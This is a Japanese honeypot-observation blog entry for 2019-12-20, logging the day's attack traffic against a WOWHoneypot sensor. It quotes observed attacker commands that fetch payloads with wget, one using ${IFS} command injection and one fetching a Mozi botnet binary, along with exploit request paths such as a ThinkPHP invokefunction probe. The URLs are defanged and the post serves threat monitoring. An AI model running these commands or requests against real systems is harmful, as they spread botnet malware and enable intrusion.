23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(279日目)

2019/12/20(金)

トータルは7739件でした。

ハンティングログは以下です。

70.165.18[.]36 wget${IFS}-qO-${IFS}hxxp[:]//104.244.75[.]222/b

www.virustotal.com
www.virustotal.com

223.104.16[.]131 wget+hxxp[:]//192.168.1[.]1:8088/Mozi.m

www.virustotal.com

件数 概要 リクエス
4139 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
43 アクセス GET /
5 DVR/NVR/IPC のAPIにおける脆弱性を狙った通 POST /editBlackAndWhiteList
3 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
3 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
3 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
2 Joomla!脆弱性の調査 GET /index.php/component/users
2 Silverlightドメイン間ポリシーファイルの調査 GET /clientaccesspolicy.xml
1 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
1 GPONルータの脆弱性を狙った通信 POST /GponForm/diag_Form?images/
1 不正中継の調査 GET hxxp[:]//www.youdao.com/?0.83062412780246898770039591056
1 不正中継の調査 GET hxxp[:]//www.gigablast.com/?0.51088010749536942991295391712
1 不正中継の調査 GET hxxp[:]//www.ceek.jp/?rands=_4239237908243630591280
1 不正中継の調査 GET hxxp[:]//m.so.com/?rands=_363011714769677073060024
1 不正中継の試み CONNECT www.google.com:443